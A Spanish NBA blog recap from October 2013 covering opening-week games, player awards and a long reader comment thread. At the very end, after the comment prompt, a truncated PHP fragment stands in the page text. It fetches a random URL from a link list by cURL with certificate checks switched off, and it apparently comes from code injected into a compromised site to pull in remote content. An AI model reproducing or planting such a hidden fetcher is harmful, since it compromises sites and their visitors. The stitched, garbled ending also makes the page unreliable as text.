La Crónica: Los Pacers sobreviven al primer back-to-back

31 de October de 2013 por txusma

Jornada maratoniana en la que se puso en marcha el grueso de la liga.

Back-to-back para varios equipos en los que se palpó su nocivo efecto. Los únicos que lograron prevalecer fueron los Pacers en New Orleans y no sin dificultades (95-90). Paul George volvió a marcar diferencias pero Roy Hibbert notó el desgaste y algunas molestias en su rodilla izquierda. De esta modo, los Pacers acabaron la jornada como líderes gracias el tropiezo de Miami en Philadelphia (110-114). Wade tuvo que descansar obligado y Carter-Williams se quedó cerca del cuadruple-doble. Zas en toda la boca de aquellos que antes del partido ya se reían de la paliza que les iba a caer a los Sixers. Por su parte, Los Lakers encajaron 125 puntos de los espectaculares Warriors, 38 de ellos de Klay Thompson en una serie de lanzamientos espectacular (94-125). Por último, Orlando logró forzarle la prórroga a los Wolves, aunque estos terminaron llevándose el gato al agua con un gran Kevin Love y hasta siete hombres en dobles dígitos (115-120).

De entre los favoritos hay que destacar el debut de Durant con 42 puntazos, que sirvió para doblegar, por los pelos, a los Jazz (101-98). Por su parte, Dwight Howard atrapó 26 rebotes en su debut con los Rockets y fue el mejor de los suyos en la victoria ante Bobcats (83-96). Los Spurs lograron una victoria pírrica ante Memphis (94-101) pero Tim Duncan sufrió una lesión (aparentemente no grave)  mientras que los Nets, sin Deron Williams en los últimos minutos del partido, decepcionaron en Cleveland en un gran despliegue colectivo de los locales (94-98). Andrew Bynum jugó 8 minutos tras perderse toda la temporada anterior. En Philadelphia le aman con locura. 

Buen debut de Detroit ante Wizards, con Monroe dominando (102-113), también de los Raptors ante Celtics, en un partido muy completo (87-93). Los Knicks ganaron a Milwaukee (83-90), aunque les dio por complicarse la vida más de lo necesario en la segunda parte y Dallas hizo lo propio ante los Hawks aunque de manera más clara. En cambio, los Nuggets decepcionaron en Sacramento (88-90). Buen comienzo de Ellis, por parte de Dallas y de Cousins por parte de Sacramento. Finalmente los “tanqueantes” Suns ganaron a los Blazers (91-104). Philadelphia y Phoenix ya están más cerca de las 10 victorias que algunos les pronosticaban.

PREMIOS

MVP: Impresionante actuación de Michael Carter-Williams. El rookie destapó el tarro de las esencias y nos dejó un partido sublime con 22 puntos, 7 rebotes, 12 asistencias y 9 robos. Ni los mejores analistas se esperaban un inicio así. Klay Thompson masacró a los Lakers con 38 puntos con un 15 de 19 y Monta Ellis se fue a los 32 puntos y 8 asistencias. Kevin Love, con 31 puntos y 17 rebotes, Kevin Durant, con 42 puntos y 6 rebotes, y Dwight Howard, 17 puntos y 26 rebotes, también estuvieron entre los mejores del día.

Rookie: Dejando a un lado a MCW, podemos destacar a Victor Oladipo, que en su segundo partido se fue a los 14 puntos, 6 rebotes y 4 asistencias y a, atención, Vitor Faverani. El ex del Pamesa salió de titular con los Celtics y anotó 13 puntos. El resto de rookies han decepcionado.

Sorpresa: Los primeros partidos del curso son muy dados a las sorpresas. Ayer destacaron Arron Afflalo (28 puntos, 9 rebotes y 5 asistencias), Alec Burks (24 puntos, 6 rebotes y 6 asistencias), Francisco Garcia (19 puntos), Trevor Ariza (28 puntos, 10 rebotes) y Cartier Martin (17 puntos). Veremos si son actuaciones flor de un día o se mantienen durante la temporada.

Decepción: A nivel colectivo las derrotas de Heat, Blazers y Nets deben haber dejados tocados a sus aficionados. A nivel individual nos quedamos con Zach Randolph y sus 2 puntos y 7 rebotes. Totalmente intrascendente para los Grizzlies. Terrible partido también de Larry Sanders con 0 puntos en 12 minutos.

Esfuerzo en vano: Nikola Vucevic anotó 22 puntos, cogió 16 rebotes y puso 3 tapones pero al final no se pudo llevar la victoria ante los Wolves. Lebron James también cayó a pesar de unos “típicos” 25 puntos, 4 rebotes y 13 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. Laker1624 dice:
    #1

    Viendo como ha empezado George y suponiendo que Indiana va a estar arriba no veo descabellado meter al 24 de los Pacers en la quiniela por el MVP de la RS.

    Un equipo que me parece que va a dar mas guerra de lo previsto son los Mavs, yo los meto en PO desde ya. Pelicans, Cavs y Pistons también me han dejado buenas sensaciones. Pensaba que a los Pistons les costaría, encajar las piezas nuevas, pero veo que empiezan bien. Aparte de Monroe también destacaría el partido de Billups.

    En cuanto a los Lakers, supongo que la versión de hoy se asemeja mas a la realidad que la de ayer. Aunque espero que no caigan de 30 puntazos cada día… como Pau no se ponga en plan maquina lo veo jodido…

      Citar

  2. HisRoyalAirness dice:
    #2

    Al que no me parece descabellado meter en la lucha por el MVP, y supongo que ya lo habeis hecho todos, es a Kevin Love. Es un jugador de otro tiempo

      Citar

  3. Laker1624 dice:
    #3

    Love es un jugadorazo capaz de hacer cosas que hace tiempo que no se veían, pero sus Wolves no me convencen. Veo difícil que le tengan en cuenta para el MVP si su equipo no hace un buen año. Ahora bien, si Minnesota rinde y este crack mantiene su nivel, no dudo que pueda ganar el premio.

      Citar

  4. Esteban dice:
    #4

    y aqui hay quien prefiere a griffin que a LOve jajajaja

    terrible anthony davis, ya que el hoop cerro, les comento que es mi apuesta al MIP, teminara el año con 20 puntos de promedio y mas de 10 rebotes

    drummond hace de las suyas, en 26 minutos, 12 puntos y 8 rebotes, lo que hubiese hecho en 36 no?

    detroit tiene muchisimo potencial, ayer cheeks jugo mucho tiempo sin drummond y con smith de 4 y monroe de 5, muy interesante, recuerda a los viejos trios (los wallace y okur, los wallace y mcdyes, wallace, mcdyes y webber, etc)

    Paul Geroge sublime aunque los pacers estan dejando bastante que desear, quiza con la vuelta de granger tenga el potencial que les di en la previa

    sobre dallas, le sobra para ser equipo de PO, si pudieran conseguir a afflalo para el quinteto incial y monta de sexto hombre, hasta podrian dar una sorpresa grata

      Citar

  5. Esteban dice:
    #5

    jajaja la supuesta ayuda del nuevo banco de los blazers de risa total

    Thomas Robinson, 4
    Joel Freeland, 3
    Dorell Wright, 3
    Mo Williams, 2

      Citar

  6. Esteban dice:
    #6

    jeremy lin en su nuevo rol de sexto hombre, mola muchisimo mas, de hecho es un jugador armado para ese rol, ojo que no le hayan encontrado la vuelta a su banca los rockets con esta movida

      Citar

  7. HisRoyalAirness dice:
    #7

    El que prefiera a Griffin antes que a Love que vaya a que le hagan un TAC porque puede tener algo grave en la cabeza

      Citar

  8. Laker1624 dice:
    #8

    Mención aparte para el debut de Michael Carter-Williams. Lo que ha hecho este chaval no creo que lo hayamos visto muchas veces, y menos debutando ante los vigentes campeones. A ver si tenemos aquí a otro base de elite.

      Citar

  9. txusma dice:
    #9

    Laker1624:
    Mención aparte para el debut de Michael Carter-Williams. Lo que ha hecho este chaval no creo que lo hayamos visto muchas veces, y menos debutando ante los vigentes campeones. A ver si tenemos aquí a otro base de elite.

    Tirando de refranero: Una golondrina no hace verano…

      Citar

  10. Laker1624 dice:
    #10

    txusma: Tirando de refranero: Una golondrina no hace verano…

    Cierto, pero hay queda su actuación de esta noche y no hay que quitarle merito. Nunca se sabe…

      Citar

  11. HisRoyalAirness dice:
    #11

    txusma: Tirando de refranero: Una golondrina no hace verano…

    Amén.

    Al margen de mis Wolves, a los que les he visto muchas dudas en defensa y un potencial infinito en ataque, me han generado dudas las aspiraciones de los Rockets y de Memphis y por supuesto los Nets y mucho OJO a los Cavs porque vi a Bynum moviéndose bien y eso es algo que puede cambiar la conferencia Este radicalmente.

      Citar

  12. rumbero dice:
    #12

    Laker1624: Cierto, pero hay queda su actuación de esta noche y no hay que quitarle merito. Nunca se sabe…

    Todas las precauciones del mundo con MCW si, pero lo de ayer fue un escándalo de estreno. No se fue con un cuádruple doble de milagro ante los todopoderosos Heat y con un equipo del que se pitorrea media NBA. El chaval tiene unas cualidades tremendas para jugar a esto y además ayer estuvo muy fino con el tiro. Lo más cojonudo es que una vez se puso Miami a +9 (con triplazo de Allen desde media pista) lo fácil era tirar la toalla porque habían dado la cara de sobras. Pero claro…los que tankean aquí son los jefes y directivos y no los jugadores.

    Y viendo el final del Nets-Cavs, sorprendió ver a Deron en el banquillo durante los últimos minutos. No se si tuvo algun tipo de lesión. Pero vaya, que donde ante un tanteo ajustado se debía imponer la veteranía de los Nets saltó la sorpresa. Juego bastante coral por parte de los Cavs, controlando bien el rebote, una breve reaparición de Bynum que enseñó cosas en apenas 7 minutos y un Irving que no tuvo su mejor día en el tiro (especialmente en el clutch) pero que tiene calidad de sobra para regalos así http://www.youtube.com/watch?v=xBQBV7Xyq_4&feature=youtu.be

    Por cierto que se ha retirado oficialmente un amigo del blog como Iverson y nadie ha dicho nada. Iverson >> Griffin no?

      Citar

  13. Laker1624 dice:
    #13

    Por cierto que se ha retirado oficialmente un amigo del blog como Iverson y nadie ha dicho nada. Iverson >> Griffin no?

    Para mi Iverson ya llevaba retirado hace un tiempo. A mi parecer ha sido uno de los mejores anotadores de la historia sin ninguna duda, aparte de ser todo un icono. Quien sabe de lo que estaríamos hablando si hubiera sido un tío mas centrado. Pese a todo, uno de los mejores que ha jugado a esto, y no me importa que no haya ganado ningún campeonato ni 10 MVPs, a este solo hacia falta verle jugar para saber que era un talento descomunal.

      Citar

  14. Denise dice:
    #14

    Laker1624:
    Por cierto que se ha retirado oficialmente un amigo del blog como Iverson y nadie ha dicho nada. Iverson >> Griffin no?

    Para mi Iverson ya llevaba retirado hace un tiempo. A mi parecer ha sido uno de los mejores anotadores de la historia sin ninguna duda, aparte de ser todo un icono. Quien sabe de lo que estaríamos hablando si hubiera sido un tío mas centrado. Pese a todo, uno de los mejores que ha jugado a esto, y no me importa que no haya ganado ningún campeonato ni 10 MVPs, a este solo hacia falta verle jugar para saber que era un talento descomunal.

    Individualmente un jugón y posiblemente el mejor jugador de la historia teniendo en cuenta en relación calidad-físico. Colectivamente, un cancer.

      Citar

  15. Denise dice:
    #15

    – No entiendo lo de Vaughn con el PF. Que cojones hace Maxiell jugando tantos minutos en un equipo en reconstrucción. Y encima no está aportando nada. Joder, tienes a Nicholson que lo está haciendo bien y a KOQ que es duro en defensa, pues nada por narices tiene que jugar Maxiell.

    – MCW tremendo pero al igual que mucha gente ayer se tocaría con los Lakers y hoy han bajado al mundo real, con este muchacho lo mismo. Con paciencia, y que siga mejorando la mano de madera que tiene.

    – Mal veo a los Thunder, de entrada no me gusta el equipo y ayer necesitan de 42 puntos de KD para doblegar a Utah. Los 10 puntos de Jefferson en 20 minutos merecen estar en el apartado de sorpresas. Yo lo daba por acabado.

    – El nuevo entrenador de los Grizzlies sigue menospreciando a Ed Davis como su predecesor. Me parece indecente que Leuer juegue mas minutos que él.

    – Que bueno es David Lee, otro tio infravaloradisimo. Y que equipazo tienen los GSW, ojala ganen el anillo. No se en cuanto estará el record de triples, pero este año lo baten fijo. Y a ver si le dan mas minutos a Bazemore, a mi me encantó en la Summer League, hoy 7-4 en 12 mtos.

    – Primer zas en la boca a los Nets. El equipo es superprofundo, pero la lucha de egos que habrá en el vestuario bfff a la mas minima tensión van a volar cabezas ahí.

    – Pese a la victoria, a mi no me gusta el equipo de los Mavs. Por dentro son muy flojitos y los dias en que Ellis este fallón, lo van a tener crudo. Que bien Carter en plan rockero que nunca muere.

    – Esteban, la 2º unidad de los Blazers esta bien. Wright y Mo Williams no van a promediar 2 puntos durante la temporada, y les faltaba Leonard y McCollum.

      Citar

  16. TheDeerHunter dice:
    #16

    Laker1624:
    Por cierto que se ha retirado oficialmente un amigo del blog como Iverson y nadie ha dicho nada. Iverson >> Griffin no?

    Para mi Iverson ya llevaba retirado hace un tiempo. A mi parecer ha sido uno de los mejores anotadores de la historia sin ninguna duda, aparte de ser todo un icono. Quien sabe de lo que estaríamos hablando si hubiera sido un tío mas centrado. Pese a todo, uno de los mejores que ha jugado a esto, y no me importa que no haya ganado ningún campeonato ni 10 MVPs, a este solo hacia falta verle jugar para saber que era un talento descomunal.

    Yo creo que para cualquiera ya llevaba tiempo retirado. Le hicimos aquí un post cuando ocurrió… antes de alguno de los advenimientos. Con eso yo creo que suficiente homenaje. Más de lo que han tenido muchos otros al respecto. Problemas de tiempo, no podemos llegar a todo.
    El problema es que si sale su nombre se lía… y son debates que ya huelen un poco.

      Citar

  17. Esteban dice:
    #17

    Denise:

    – Mal veo a los Thunder, de entrada no me gusta el equipo y ayer necesitan de 42 puntos de KD para doblegar a Utah. Los 10 puntos de Jefferson en 20 minutos merecen estar en el apartado de sorpresas. Yo lo daba por acabado.

    mm yo no tan mal, si el tio que se tiene que ir a los 42 para ganar un juego es perkins si los veria mal, pero Durant puede hacerlo cada noche

    – Esteban, la 2º unidad de los Blazers esta bien. Wright y Mo Williams no van a promediar 2 puntos durante la temporada, y les faltaba Leonard y McCollum.

    esta por verse, igualmente confio mucho en Mo

      Citar

  18. franitis dice:
    #18

    Por lo que veo tras resumen y estadística, los Celtics siguen igual que en pretemporada, igualado el marcador todo el partido pero al final falta el “clutch” que sí aportaban KG y PP el año pasado… Al menos Green 23 puntos y Faverani AKA “El hombre indestructible” acercándose a mi quinteto de mejores rookies de la porra (lastima que Olynyk no le fuera a la zaga…). Sin noticias de Pressey y Sullinger no jugó por estar sancionado por su escándalo doméstico… A esperar el partido del sábado.

      Citar

  19. Esteban dice:
    #19

    franitis:
    Por lo que veo tras resumen y estadística, los Celtics siguen igual que en pretemporada, igualado el marcador todo el partido pero al final falta el “clutch” que sí aportaban KG y PP el año pasado… Al menos Green 23 puntos y Faverani AKA “El hombre indestructible” acercándose a mi quinteto de mejores rookies de la porra (lastima que Olynyk no le fuera a la zaga…). Sin noticias de Pressey y Sullinger no jugó por estar sancionado por su escándalo doméstico… A esperar el partido del sábado.

    green tiene una pinta barbara a danny granger, que promediaba 24 y 25 puntos en temporadas seguis cuando los pacers eran un desastre
    una vez que empezaron a mejorar, fue bajando sus numeros, hasta terminar como suplente hoy

      Citar

  20. franitis dice:
    #20

    Esteban: green tiene una pinta barbara a danny granger, que promediaba 24 y 25 puntos en temporadas seguis cuando los pacers eran un desastre
    una vez que empezaron a mejorar, fue bajando sus numeros, hasta terminar como suplente hoy

    Con 27 tacos y un equipo entero para él, no parece que Green vaya a romper en un MVP en esta vida… Se hubiese tenido que notar antes. Tanto él como Bass pueden valer como fondo de armario para cualquier contender, pero no para ser el núcleo duro de un equipo.

      Citar

  21. Heineken dice:
    #21

    Para sorpresa el partidazo de Miles Plumlee

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>